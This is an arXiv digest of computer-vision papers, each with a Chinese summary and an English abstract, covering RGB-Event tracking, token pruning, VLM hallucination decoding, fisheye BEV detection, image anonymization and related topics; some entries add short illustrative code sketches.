【速读】:该论文旨在解决高动态运动场景下传统RGB传感器因运动模糊导致目标跟踪性能显著下降的问题。现有RGB-Event融合方法通常将事件数据视为密集强度表示,并采用黑箱式融合策略,未能显式利用事件流中蕴含的定向几何先验来校正退化的RGB特征。其解决方案的关键在于提出SOR-Track框架,核心是Spatial Orthogonal Refinement(SOR)模块:该模块通过一组由局部运动方向动态引导的正交方向滤波器,从事件流中提取锐利且与运动一致的结构响应,作为几何锚点,通过非对称结构调制机制调节并优化RGB纹理,从而显式弥合多模态间的结构差异。
链接: https://arxiv.org/abs/2603.27913
作者: Dexing Huang,Shiao Wang,Fan Zhang,Xiao Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Joint International Conference on Automation-Intelligence-Safety and International Symposium on Autonomous Systems 2026 (ICAIS and ISAS 2026)
Abstract:Robust visual object tracking (VOT) remains challenging in high-speed motion scenarios, where conventional RGB sensors suffer from severe motion blur and performance degradation. Event cameras, with microsecond temporal resolution and high dynamic range, provide complementary structural cues that can potentially compensate for these limitations. However, existing RGB-Event fusion methods typically treat event data as dense intensity representations and adopt black-box fusion strategies, failing to explicitly leverage the directional geometric priors inherently encoded in event streams to rectify degraded RGB features. To address this limitation, we propose SOR-Track, a streamlined framework for robust RGB-Event tracking based on Spatial Orthogonal Refinement (SOR). The core SOR module employs a set of orthogonal directional filters that are dynamically guided by local motion orientations to extract sharp and motion-consistent structural responses from event streams. These responses serve as geometric anchors to modulate and refine aliased RGB textures through an asymmetric structural modulation mechanism, thereby explicitly bridging structural discrepancies between two modalities. Extensive experiments on the large-scale FE108 benchmark demonstrate that SOR-Track consistently outperforms existing fusion-based trackers, particularly under motion blur and low-light conditions. Despite its simplicity, the proposed method offers a principled and physics-grounded approach to multi-modal feature alignment and texture rectification. The source code of this paper will be released on this https URL
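注:论文中的正交方向滤波器由局部运动方向动态引导,具体核形式未公开;以下草图用一对固定的正交 Sobel 核代替,仅示意"从事件帧提取正交方向结构响应"的思路(卷积实现为朴素循环,便于阅读):

```python
import numpy as np

def orthogonal_directional_responses(event_frame):
    """对事件帧施加一对正交的一阶方向滤波器(此处用 Sobel 核
    代替论文中运动引导的滤波器),返回水平/垂直方向响应。"""
    kx = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], dtype=float)
    ky = kx.T  # 与 kx 正交的方向核

    def conv2(img, k):
        # 无填充的 3x3 有效卷积(相关形式)
        h, w = img.shape
        out = np.zeros((h - 2, w - 2))
        for i in range(h - 2):
            for j in range(w - 2):
                out[i, j] = (img[i:i + 3, j:j + 3] * k).sum()
        return out

    return conv2(event_frame, kx), conv2(event_frame, ky)
```

在 SOR-Track 中,此类方向响应被用作几何锚点去调制 RGB 纹理;调制机制本身此处未建模。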
[CV-110] BINO: Encoder Centric Self Supervised Stereo With Native Pair Input
【速读】:该论文旨在解决立体视觉(stereo vision)中特征表示难以保持跨视角细粒度对应关系的问题,传统自监督视觉模型虽能良好迁移,但并非为此目标设计,而几何导向的方法通常依赖双目解码器或预训练阶段的显式链接模块(explicit linkage module)。其解决方案的关键在于提出BINO架构,通过在输入阶段融合校正后的图像对形成“立体微单元标记”(stereo micro cell tokens),并引入行感知的补丁相位位置编码(row aware patch phase positional encoding),使强双目结构得以在紧凑的编码器内部学习。此外,采用单视图掩码标记仅蒸馏(masked token only distillation)策略,结合遮挡与视图特定外观不匹配损失进行训练,在无需额外链接模块的情况下实现了优于现有基线的冻结描述符性能,表明跨视角推理能力可被整合进轻量级且可复用的编码器中。
链接: https://arxiv.org/abs/2603.27904
作者: Haokun Zhou
机构: Imperial College London (帝国理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Stereo needs features that preserve fine cross view correspondence rather than only semantic similarity. Recent self supervised vision models transfer well, but they are not built for this goal, and geometry focused methods often rely on a binocular decoder or another explicit linkage module during pretraining. BINO asks whether strong binocular structure can instead be learned inside a compact encoder. It does this by fusing the rectified pair at the input stage, forming stereo micro cell tokens, and using a row aware patch phase positional encoding. Training uses one view masked token only distillation together with occlusion and view specific appearance mismatch. In a strict low resource setting with pretraining only on KITTI object, BINO gives the best frozen descriptor results under a no linkage probe among all compared baselines on proxy dense stereo, hard negative retrieval, and KITTI Stereo 2012 disparity. With the same lightweight stereo head for every encoder, it stays near CroCo v2 while using a much smaller encoder. Supplementary transfer experiments on KITTI Stereo 2015 show the same qualitative trend. These results suggest that much of the cross view reasoning often assigned to a separate linkage module can be learned inside a compact and reusable encoder.
[CV-111] Rényi Entropy: A New Token Pruning Metric for Vision Transformers
【速读】:该论文旨在解决视觉 Transformer (Vision Transformer, ViT) 在高分辨率输入下因自注意力机制具有 O(N²) 时间复杂度而导致推理成本高昂的问题。现有基于 [CLS] 标记的重要性评估方法在早期网络层中可靠性不足,因其语义表示尚未成熟,易导致误判和信息丢失。为此,作者提出一种无需训练的 token 重要性度量方法——Col-Ln,其基于 Rényi 熵构建,能够在网络第一层即识别出有信息量的 token,从而实现更可靠的早期层剪枝,显著提升模型推理效率。实验表明,该方法在 ViT 和大型视觉语言模型(Large Vision-Language Models, LVLMs)上均优于当前最优剪枝方法。
链接: https://arxiv.org/abs/2603.27900
作者: Wei-Yuan Su,Ruijie Zhang,Zheng Zhang
机构: University of California, Santa Barbara (加州大学圣塔芭芭拉分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision Transformers (ViTs) achieve state-of-the-art performance but suffer from the O(N^2) complexity of self-attention, making inference costly for high-resolution inputs. To address this bottleneck, token pruning has emerged as a critical technique to accelerate inference. Most existing methods rely on the [CLS] token to estimate patch importance. However, we argue that the [CLS] token can be unreliable in early layers where semantic representations are still immature. As a result, pruning in the early layer often leads to inaccurate importance estimation and unnecessary information loss. In this work, we propose a training-free token importance metric, namely Col-Ln, which is derived from Rényi entropy that enables the identification of informative tokens from the first layer of the network, thereby enabling more reliable pruning in token reduction. Extensive experiments on ViTs and Large Vision-Language Models (LVLMs) demonstrate that our approach consistently outperforms state-of-the-art pruning methods across diverse benchmarks.
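注:论文未公开 Col-Ln 的具体计算方式,以下 Python 草图仅示意"基于 Rényi 熵的 token 重要性评分"这一思路:对每个 token 所接收的注意力分布计算 Rényi 熵,并保留得分最高的一部分 token;其中的打分对象(注意力列)与保留策略均为本文假设:

```python
import numpy as np

def renyi_entropy(p, alpha=2.0, eps=1e-12):
    """Rényi 熵:H_alpha(p) = log(sum_i p_i^alpha) / (1 - alpha),alpha != 1。"""
    p = np.asarray(p, dtype=float)
    p = p / (p.sum() + eps)  # 归一化为概率分布
    return float(np.log((p ** alpha).sum() + eps) / (1.0 - alpha))

def prune_tokens(attn, keep_ratio=0.5, alpha=2.0):
    """attn: (N, N) 第一层自注意力图(行随机)。
    以 token j 所接收注意力(第 j 列)的 Rényi 熵作为其得分,
    保留得分最高的 keep_ratio 比例的 token。"""
    n = attn.shape[0]
    scores = np.array([renyi_entropy(attn[:, j], alpha) for j in range(n)])
    k = max(1, int(round(n * keep_ratio)))
    keep = np.sort(np.argsort(-scores)[:k])  # 保持原 token 顺序
    return keep, scores
```

alpha=2 时即为碰撞熵;alpha→1 时退化为香农熵,可按任务调节对尖峰分布的敏感度。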
[CV-112] SAGE: Sink-Aware Grounded Decoding for Multimodal Hallucination Mitigation
【速读】:该论文旨在解决大规模视觉语言模型(Vision-Language Models, VLMs)在生成过程中常见的幻觉问题,即模型输出内容与输入图像不一致的现象。现有方法多依赖后处理过滤、额外训练目标或外部验证,但未能在解码阶段实时干预以抑制幻觉。其解决方案的关键在于提出SAGE(Sink-Aware Grounded Decoding)框架,通过动态调节自注意力机制来增强生成过程的视觉一致性:识别出易引发幻觉的“注意力sink tokens”(如标点符号等语义信息稀疏的token),将其作为锚点实时监测生成内容的视觉接地可靠性;基于这些token提取语义概念,并结合自注意力图与梯度归因法评估其空间一致性,进而自适应地调整注意力分布——强化可靠区域或抑制不可靠区域,从而在不改变模型结构或重新训练的前提下显著降低幻觉率,同时保持描述完整性。
链接: https://arxiv.org/abs/2603.27898
作者: Tripti Shukla,Zsolt Kira
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 25 pages, 6 figures, 7 tables
Abstract:Large vision-language models (VLMs) frequently suffer from hallucinations, generating content that is inconsistent with visual inputs. Existing methods typically address this problem through post-hoc filtering, additional training objectives, or external verification, but they do not intervene during the decoding process when hallucinations arise. In this work, we introduce SAGE, a Sink-Aware Grounded Decoding framework that mitigates hallucinations by dynamically modulating self-attention during generation. Hallucinations are strongly correlated with attention sink tokens - punctuation or function tokens that accumulate disproportionate attention despite carrying limited semantic content. SAGE leverages these tokens as anchors to monitor grounding reliability in real time. At each sink trigger, the method extracts semantic concepts from the generated sequence, estimates their visual grounding using both self-attention maps and gradient-based attribution, and measures their spatial agreement. Based on this signal, self-attention distributions are adaptively sharpened or broadened to reinforce grounded regions or suppress unreliable ones. Extensive experiments across diverse hallucination benchmarks demonstrate that SAGE consistently outperforms existing decoding strategies, achieving substantial reductions in hallucination while preserving descriptive coverage, without requiring model retraining or architectural modifications. Our method achieves an average relative improvement of 10.65% on MSCOCO and 7.19% on AMBER across diverse VLM architectures, demonstrating consistent gains in hallucination mitigation.
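注:以下草图示意"注意力 sink token 检测"的基本思路:将接收注意力远超均匀份额、且本身为标点/功能词的 token 标记为 sink。其中阈值(3 倍均匀份额)与候选词表均为本文假设,并非 SAGE 的原始判据:

```python
import numpy as np

# 假设的标点/功能词候选集,仅作演示
SINK_CANDIDATES = {".", ",", ";", "the", "a"}

def find_attention_sinks(attn, token_strings, ratio=3.0):
    """attn: (N, N) 自注意力图;token_strings: 各 token 的文本。
    返回接收注意力份额超过 ratio 倍均匀份额的候选 sink token 下标。"""
    n = attn.shape[0]
    received = attn.sum(axis=0) / attn.sum()  # 每个 token 接收的注意力占比
    uniform = 1.0 / n
    return [i for i in range(n)
            if received[i] > ratio * uniform
            and token_strings[i] in SINK_CANDIDATES]
```

SAGE 以此类 sink 位置为锚点,在生成时触发视觉接地检查并调节注意力分布;该调节步骤此处未建模。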
[CV-113] Poppy: Polarization-based Plug-and-Play Guidance for Enhancing Monocular Normal Estimation
【速读】:该论文旨在解决单目RGB图像表面法向估计器在反射、无纹理和暗表面等边缘场景下性能下降的问题。现有方法依赖多视角采集或特定训练数据,限制了泛化能力。其解决方案的关键在于提出一种无需训练的框架Poppy,通过单次偏振测量在测试时优化输入RGB图像与输出法向之间的像素级偏移,并结合学习到的反射率分解,利用可微渲染层将修正后的法向转换为偏振预测,从而最小化与观测信号的差异,实现对挑战性表面法向的有效修正。
链接: https://arxiv.org/abs/2603.27891
作者: Irene Kim,Sai Tanmay Reddy Chakkera,Alexandros Graikos,Dimitris Samaras,Akshat Dave
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: project page: this https URL
Abstract:Monocular surface normal estimators trained on large-scale RGB-normal data often perform poorly in the edge cases of reflective, textureless, and dark surfaces. Polarization encodes surface orientation independently of texture and albedo, offering a physics-based complement for these cases. Existing polarization methods, however, require multi-view capture or specialized training data, limiting generalization. We introduce Poppy, a training-free framework that refines normals from any frozen RGB backbone using single-shot polarization measurements at test time. Keeping backbone weights frozen, Poppy optimizes per-pixel offsets to the input RGB and output normal along with a learned reflectance decomposition. A differentiable rendering layer converts the refined normals into polarization predictions and penalizes mismatches with the observed signal. Across seven benchmarks and three backbone architectures (diffusion, flow, and feed-forward), Poppy reduces mean angular error by 23-26% on synthetic data and 6-16% on real data. These results show that guiding learned RGB-based normal estimators with polarization cues at test time refines normals on challenging surfaces without retraining.
[CV-114] Wan-R1: Verifiable-Reinforcement Learning for Video Reasoning
【速读】:该论文旨在解决视频生成模型在空间推理和多步规划任务中表现不佳的问题,尤其是强化学习(Reinforcement Learning, RL)在提升视频推理能力时因奖励设计不当而导致的泛化性能受限问题。其解决方案的关键在于设计可验证的奖励函数(verifiable reward functions),而非依赖于多模态奖励模型。作者通过在流形基础视频模型上应用组相对策略优化(Group Relative Policy Optimization, GRPO),并分别针对结构化游戏环境引入多组件轨迹奖励、针对机器人导航任务提出嵌入层级别的可验证奖励,实验证明此类奖励机制能显著提升模型在复杂3D迷宫和陷阱规避任务中的准确率(分别提升29.1%和51.4%),同时避免了多模态奖励模型导致的退化解问题,从而确立了可验证奖励设计作为实现鲁棒视频推理的核心要素。
链接: https://arxiv.org/abs/2603.27866
作者: Ming Liu,Yunbei Zhang,Shilong Liu,Liwen Wang,Wensheng Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Video generation models produce visually coherent content but struggle with tasks requiring spatial reasoning and multi-step planning. Reinforcement learning (RL) offers a path to improve generalization, but its effectiveness in video reasoning hinges on reward design – a challenge that has received little systematic study. We investigate this problem by adapting Group Relative Policy Optimization (GRPO) to flow-based video models and training them on maze-solving and robotic navigation tasks. We first show that multimodal reward models fail catastrophically in this setting. To address this, we design verifiable reward functions grounded in objective task metrics. For structured game environments, we introduce a multi-component trajectory reward. For robotic navigation, we propose an embedding-level verifiable reward. Our experiments show that RL fine-tuning with verifiable rewards improves generalization. For example, on complex 3D mazes, our model improves exact match accuracy by 29.1% over the SFT baseline, and on trap-avoidance tasks by 51.4%. Our systematic reward analysis reveals that verifiable rewards are critical for stable training, while multimodal reward models could lead to degenerate solutions. These findings establish verifiable reward design as a key enabler for robust video reasoning. Code will be publicly available.
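注:论文的多组件轨迹奖励具体构成未公开,以下草图按摘要描述拼出一个可验证的迷宫奖励示例;合法性、到达目标、与参考路径完全匹配三个分量及其权重均为本文假设:

```python
def maze_trajectory_reward(path, maze, goal, gt_path=None):
    """可验证的迷宫轨迹奖励草图。
    path: [(row, col), ...] 解码出的轨迹;maze: 0 表示可通行,1 表示障碍。
    分量(权重为假设值):
      - 0.3 轨迹合法(起点可通行,每步走到相邻可通行格)
      - 0.5 终点为目标
      - 0.2 与参考路径完全一致(可选)"""
    def free(c):
        r, k = c
        return 0 <= r < len(maze) and 0 <= k < len(maze[0]) and maze[r][k] == 0

    valid = bool(path) and free(path[0]) and all(
        free(b) and abs(a[0] - b[0]) + abs(a[1] - b[1]) == 1
        for a, b in zip(path, path[1:]))

    reward = 0.0
    if valid:
        reward += 0.3
        if tuple(path[-1]) == tuple(goal):
            reward += 0.5
        if gt_path is not None and list(map(tuple, path)) == list(map(tuple, gt_path)):
            reward += 0.2
    return reward
```

这类奖励的每个分量都可由程序客观验证,这正是摘要中对比多模态奖励模型时强调的稳定性来源。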
[CV-115] ImagenWorld: Stress-Testing Image Generation Models with Explainable Human Evaluation on Open-ended Real-World Tasks ICLR2026
【速读】:该论文旨在解决当前图像生成模型评估基准存在的局限性问题,如任务覆盖不全、领域单一、缺乏可解释性评分等,导致对模型性能的判断不够全面和深入。其解决方案的关键在于提出一个名为ImagenWorld的新基准,包含3.6K条件集(涵盖六类核心任务与六类主题领域),并配套20K细粒度人工标注与可解释的评估框架,能够识别局部对象级和区域级错误,从而实现对生成质量的精细化诊断。这一设计不仅提升了评估的严谨性,也为模型优化提供了明确的方向指引。
链接: https://arxiv.org/abs/2603.27862
作者: Samin Mahdizadeh Sani,Max Ku,Nima Jamali,Matina Mahdizadeh Sani,Paria Khoshtab,Wei-Chieh Sun,Parnian Fazel,Zhi Rui Tam,Thomas Chong,Edisy Kin Wai Chan,Donald Wai Tong Tsang,Chiao-Wei Hsu,Ting Wai Lam,Ho Yin Sam Ng,Chiafeng Chu,Chak-Wing Mak,Keming Wu,Hiu Tung Wong,Yik Chun Ho,Chi Ruan,Zhuofeng Li,I-Sheng Fang,Shih-Ying Yeh,Ho Kei Cheng,Ping Nie,Wenhu Chen
机构: University of Waterloo (滑铁卢大学); G-G-G; Comfy Org; University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); Independent
类目: Graphics (cs.GR); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: Published in ICLR 2026
Abstract:Advances in diffusion, autoregressive, and hybrid models have enabled high-quality image synthesis for tasks such as text-to-image, editing, and reference-guided composition. Yet, existing benchmarks remain limited, either focus on isolated tasks, cover only narrow domains, or provide opaque scores without explaining failure modes. We introduce ImagenWorld, a benchmark of 3.6K condition sets spanning six core tasks (generation and editing, with single or multiple references) and six topical domains (artworks, photorealistic images, information graphics, textual graphics, computer graphics, and screenshots). The benchmark is supported by 20K fine-grained human annotations and an explainable evaluation schema that tags localized object-level and segment-level errors, complementing automated VLM-based metrics. Our large-scale evaluation of 14 models yields several insights: (1) models typically struggle more in editing tasks than in generation tasks, especially in local edits. (2) models excel in artistic and photorealistic settings but struggle with symbolic and text-heavy domains such as screenshots and information graphics. (3) closed-source systems lead overall, while targeted data curation (e.g., Qwen-Image) narrows the gap in text-heavy cases. (4) modern VLM-based metrics achieve Kendall accuracies up to 0.79, approximating human ranking, but fall short of fine-grained, explainable error attribution. ImagenWorld provides both a rigorous benchmark and a diagnostic tool to advance robust image generation.
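注:摘要中的 Kendall accuracy 可理解为自动指标与人工评分在样本对上的排序一致率。以下为一个通用的成对一致率计算草图(忽略并列对;是否与论文的精确定义完全一致未作保证):

```python
from itertools import combinations

def kendall_accuracy(metric_scores, human_scores):
    """自动指标与人工评分的成对排序一致率:
    在两边都无并列的样本对中,统计两种打分方向一致的比例。"""
    agree = total = 0
    for i, j in combinations(range(len(metric_scores)), 2):
        dm = metric_scores[i] - metric_scores[j]
        dh = human_scores[i] - human_scores[j]
        if dm == 0 or dh == 0:  # 跳过并列对
            continue
        total += 1
        agree += (dm > 0) == (dh > 0)
    return agree / total if total else 0.0
```

该值为 1.0 表示自动指标完全复现人工排序,0.5 约等于随机;摘要中 0.79 的最好结果即处于两者之间。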
[CV-116] 3-D Representations for Hyperspectral Flame Tomography
【速读】:该论文旨在解决火焰三维热化学重构中传统体素网格(voxel-grid)表示与连续神经表示在重建精度和计算效率方面的定量比较问题。其关键解决方案是构建两种统一的建模框架:一种基于不同正则化策略的体素网格表示,另一种基于神经网络的连续表示,二者均输出温度和组分的空间分布函数,并通过射线追踪求解辐射传输方程以模拟高光谱红外相机接收到的光谱强度,最终对比两者在合成池火场景下的重建准确性、内存占用和运行时间表现。结果表明,采用总变差(total variation)正则化的体素网格方法在保持较低内存消耗和运行时间的同时实现了最高精度的重建效果。
链接: https://arxiv.org/abs/2603.27832
作者: Nicolas Tricard,Zituo Chen,Sili Deng
机构: Massachusetts Institute of Technology (麻省理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 7 pages, 2 figures, 1 table
Abstract:Flame tomography is a compelling approach for extracting large amounts of data from experiments via 3-D thermochemical reconstruction. Recent efforts employing neural-network flame representations have suggested improved reconstruction quality compared with classical tomography approaches, but a rigorous quantitative comparison with the same algorithm using a voxel-grid representation has not been conducted. Here, we compare a classical voxel-grid representation with varying regularizers to a continuous neural representation for tomographic reconstruction of a simulated pool fire. The representations are constructed to give temperature and composition as a function of location, and a subsequent ray-tracing step is used to solve the radiative transfer equation to determine the spectral intensity incident on hyperspectral infrared cameras, which is then convolved with an instrument lineshape function. We demonstrate that the voxel-grid approach with a total-variation regularizer reproduces the ground-truth synthetic flame with the highest accuracy for reduced memory intensity and runtime. Future work will explore more representations and under experimental configurations.
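注:摘要中效果最好的体素网格方法采用 total variation 正则项,其各向异性离散形式可按三个坐标轴上相邻体素差分绝对值之和计算,以下为一个最小草图:

```python
import numpy as np

def total_variation_3d(field):
    """三维体素场的各向异性总变差:
    TV(f) = sum_axis sum |f[i+1] - f[i]|(沿每个轴的前向差分)。"""
    tv = 0.0
    for axis in range(3):
        tv += np.abs(np.diff(field, axis=axis)).sum()
    return float(tv)
```

重建时将该项乘以权重加入数据拟合损失,即可在保留火焰锐利边界的同时抑制体素间的噪声振荡,这正是 TV 相对于平滑类正则项的优势。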
[CV-117] Benchmarking Multi-View BEV Object Detection with Mixed Pinhole and Fisheye Cameras ICRA
【速读】:该论文旨在解决当前鸟瞰图(Bird’s-Eye View, BEV)3D目标检测模型在混合相机配置(包括针孔相机与鱼眼相机)下性能下降的问题,尤其是在使用鱼眼相机时因径向畸变导致的检测精度降低。其核心解决方案在于构建首个基于真实数据的BEV 3D检测基准——将KITTI-360数据集转换为nuScenes格式,并系统性地提出三种适应策略:1)通过图像矫正实现零样本评估和微调;2)基于MEI相机模型设计畸变感知的视图变换模块(View Transformation Module, VTM);3)采用极坐标表示以更好地匹配鱼眼相机的径向畸变特性。研究表明,无需投影的架构(如PETR)对鱼眼畸变具有更强的鲁棒性,优于依赖传统投影的VTM方法,从而为设计高效、低成本且鲁棒的3D感知系统提供了实践指导。
链接: https://arxiv.org/abs/2603.27818
作者: Xiangzhong Liu,Hao Shen
机构: fortiss GmbH(德国弗劳恩霍夫信息安全与通信技术研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 8 pages, 5 figures, IEEE International Conference on Robotics and Automation (ICRA), Vienna, Austria, 1-5 June 2026
Abstract:Modern autonomous driving systems increasingly rely on mixed camera configurations with pinhole and fisheye cameras for full view perception. However, Bird’s-Eye View (BEV) 3D object detection models are predominantly designed for pinhole cameras, leading to performance degradation under fisheye distortion. To bridge this gap, we introduce a multi-view BEV detection benchmark with mixed cameras by converting KITTI-360 into nuScenes format. Our study encompasses three adaptations: rectification for zero-shot evaluation and fine-tuning of nuScenes-trained models, distortion-aware view transformation modules (VTMs) via the MEI camera model, and polar coordinate representations to better align with radial distortion. We systematically evaluate three representative BEV architectures, BEVFormer, BEVDet and PETR, across these strategies. We demonstrate that projection-free architectures are inherently more robust and effective against fisheye distortion than other VTMs. This work establishes the first real-data 3D detection benchmark with fisheye and pinhole images and provides systematic adaptation and practical guidelines for designing robust and cost-effective 3D perception systems. The code is available at this https URL.
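注:论文中畸变感知视图变换所依据的 MEI(统一)相机模型,其核心投影为:三维点先按到原点的距离 ρ 归一化,再以镜面参数 ξ 偏移后做透视投影。以下草图忽略了切向/径向畸变项,仅保留该核心步骤:

```python
import numpy as np

def mei_project(p, xi, fx, fy, cx, cy):
    """MEI 统一相机模型的简化投影(忽略畸变项)。
    p: 相机坐标系下的三维点 (x, y, z);xi: 镜面参数,xi=0 退化为针孔模型。"""
    x, y, z = p
    rho = np.sqrt(x * x + y * y + z * z)
    denom = z + xi * rho  # xi 把投影中心沿光轴偏移,从而建模大视场畸变
    u = fx * (x / denom) + cx
    v = fy * (y / denom) + cy
    return u, v
```

在视图变换模块中,用该投影替换针孔投影即可把鱼眼像素正确映射到 BEV 平面;而摘要的结论是,免投影架构(如 PETR)即使不做这种替换也更鲁棒。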
[CV-118] Towards Context-Aware Image Anonymization with Multi-Agent Reasoning CVPR2026
【速读】:该论文旨在解决街景图像中个人身份信息(PII)的隐私保护问题,尤其是现有匿名化方法在处理上下文依赖性标识符时存在过度处理或遗漏细微标识的问题,以及基于API的解决方案对数据主权的潜在威胁。其核心解决方案是提出一个基于多智能体推理的上下文感知图像匿名化框架CAIAMAR,关键在于通过三个专业化智能体在Plan-Do-Check-Act(PDCA)循环中协作,结合空间滤波的粗到精检测策略与扩散模型引导的去关联化处理,实现对直接和间接PII的精准识别与匿名化,同时保持图像语义完整性并满足GDPR透明性要求。
链接: https://arxiv.org/abs/2603.27817
作者: Robert Aufschläger,Jakob Folz,Gautam Savaliya,Manjitha D Vidanalage,Michael Heigl,Martin Schramm
机构: Deggendorf Institute of Technology (德根多夫技术学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR)
备注: Accepted to IEEE CVPR 2026 GRAIL-V Workshop
Abstract:Street-level imagery contains personally identifiable information (PII), some of which is context-dependent. Existing anonymization methods either over-process images or miss subtle identifiers, while API-based solutions compromise data sovereignty. We present an agentic framework CAIAMAR (Context-Aware Image Anonymization with Multi-Agent Reasoning) for context-aware PII segmentation with diffusion-based anonymization, combining pre-defined processing for high-confidence cases with multi-agent reasoning for indirect identifiers. Three specialized agents coordinate via round-robin speaker selection in a Plan-Do-Check-Act (PDCA) cycle, enabling large vision-language models to classify PII based on spatial context (private vs. public property) rather than rigid category rules. The agents implement spatially-filtered coarse-to-fine detection where a scout-and-zoom strategy identifies candidates, open-vocabulary segmentation processes localized crops, and IoU-based deduplication (30% threshold) prevents redundant processing. Modal-specific diffusion guidance with appearance decorrelation substantially reduces re-identification (Re-ID) risks. On CUHK03-NP, our method reduces person Re-ID risk by 73% (R1: 16.9% vs. 62.4% baseline). For image quality preservation on CityScapes, we achieve KID: 0.001, and FID: 9.1, significantly outperforming existing anonymization. The agentic workflow detects non-direct PII instances across object categories, and downstream semantic segmentation is preserved. Operating entirely on-premise with open-source models, the framework generates human-interpretable audit trails supporting EU’s GDPR transparency requirements while flagging failed cases for human review.
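注:摘要中提到的"IoU 30% 阈值去重"可按贪心方式草拟如下;贪心保留顺序为本文假设,论文可能按置信度排序:

```python
def iou(a, b):
    """两个轴对齐框 (x1, y1, x2, y2) 的交并比。"""
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0.0, ix2 - ix1) * max(0.0, iy2 - iy1)
    area = lambda r: (r[2] - r[0]) * (r[3] - r[1])
    union = area(a) + area(b) - inter
    return inter / union if union > 0 else 0.0

def dedup(boxes, thr=0.30):
    """贪心去重:与已保留框 IoU 超过阈值(30%)的检测视为重复并丢弃。"""
    kept = []
    for b in boxes:
        if all(iou(b, k) <= thr for k in kept):
            kept.append(b)
    return kept
```

该步骤位于开放词表分割之前,避免多个智能体对同一候选区域做重复的昂贵处理。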
[CV-119] MuSEAgent: A Multimodal Reasoning Agent with Stateful Experiences
【速读】:该论文旨在解决现有研究代理(Research Agent)在处理多模态信息时,因缺乏对交互过程中状态依赖性经验的建模而导致决策能力受限的问题。传统方法通常依赖轨迹级(trajectory-level)的经验检索,难以捕捉细粒度的决策逻辑与跨任务的可迁移知识。其解决方案的关键在于提出一种状态感知的经验学习范式(stateful experience learning paradigm),通过事后推理(hindsight reasoning)将交互数据抽象为原子化的决策经验,并构建质量过滤后的经验库(experience bank),支持策略驱动的推理阶段经验检索。该机制使MuSEAgent能够结合广度搜索与深度搜索策略,动态获取跨模态、多语义视角的指导信息,从而显著提升复杂多模态推理任务中的表现。
链接: https://arxiv.org/abs/2603.27813
作者: Shijian Wang,Jiarui Jin,Runhao Fu,Zexuan Yan,Xingjian Wang,Mengkang Hu,Eric Wang,Xiaoxi Li,Kangning Zhang,Li Yao,Wenxiang Jiao,Xuelian Cheng,Yuan Lu,Zongyuan Ge
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Research agents have recently achieved significant progress in information seeking and synthesis across heterogeneous textual and visual sources. In this paper, we introduce MuSEAgent, a multimodal reasoning agent that enhances decision-making by extending the capabilities of research agents to discover and leverage stateful experiences. Rather than relying on trajectory-level retrieval, we propose a stateful experience learning paradigm that abstracts interaction data into atomic decision experiences through hindsight reasoning. These experiences are organized into a quality-filtered experience bank that supports policy-driven experience retrieval at inference time. Specifically, MuSEAgent enables adaptive experience exploitation through complementary wide- and deep-search strategies, allowing the agent to dynamically retrieve multimodal guidance across diverse compositional semantic viewpoints. Extensive experiments demonstrate that MuSEAgent consistently outperforms strong trajectory-level experience retrieval baselines on both fine-grained visual perception and complex multimodal reasoning tasks. These results validate the effectiveness of stateful experience modeling in improving multimodal agent reasoning.
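下面给出一个极简示意(非论文官方实现),用于说明摘要中"质量过滤的经验库 + 策略驱动的经验检索"这一思路:先按质量分数过滤经验条目,再按与查询的余弦相似度取 top-k。其中函数名、质量阈值、向量化表示等均为本文示例自行假设。

```python
import numpy as np

def retrieve_experiences(query_vec, bank_vecs, bank_quality, k=3, min_quality=0.5):
    """质量过滤 + 余弦相似度 top-k 检索的最小示意。

    query_vec:    查询状态的向量表示
    bank_vecs:    经验库中各条经验的向量表示 (N, d)
    bank_quality: 每条经验的质量分数, 低于 min_quality 的条目被过滤
    返回按相似度降序排列的经验下标列表
    """
    keep = np.where(np.asarray(bank_quality) >= min_quality)[0]
    q = query_vec / np.linalg.norm(query_vec)
    b = bank_vecs[keep] / np.linalg.norm(bank_vecs[keep], axis=1, keepdims=True)
    order = keep[np.argsort(-(b @ q))[:k]]
    return order.tolist()
```

实际系统中的"宽搜索/深搜索"还会在不同语义视角下多次调用类似的检索过程,这里仅展示单次检索的骨架。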
[CV-120] Tracking without Seeing: Geospatial Inference using Encrypted Traffic from Distributed Nodes
【速读】:该论文旨在解决在无法获取原始信号级传感数据的情况下,如何通过加密的报文级信息实现对动态环境中物体的精准地理空间跟踪问题。传统方法依赖于多分布式传感器的原始信号级信息融合,而本文提出了一种基于学习的框架GraySense,其关键在于利用无线视频传输中报文大小与场景动态之间的内在关联,从加密网络流量中提取间接感知信息,并结合可选的直接摄像头输入,通过双阶段架构(报文分组模块和基于Transformer的追踪模块)完成对象位置估计,从而在不访问原始流媒体的前提下实现了2.33米的欧氏距离跟踪误差,显著扩展了隐式信号在感知任务中的应用边界。
链接: https://arxiv.org/abs/2603.27811
作者: Sadik Yagiz Yetim,Gaofeng Dong,Isaac-Neil Zanoria,Ronit Barman,Maggie Wigness,Tarek Abdelzaher,Mani Srivastava,Suhas Diggavi
机构: University of California, Los Angeles (加州大学洛杉矶分校); DEVCOM Army Research Laboratory (美国陆军研究实验室); University of Illinois at Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG); Networking and Internet Architecture (cs.NI)
备注:
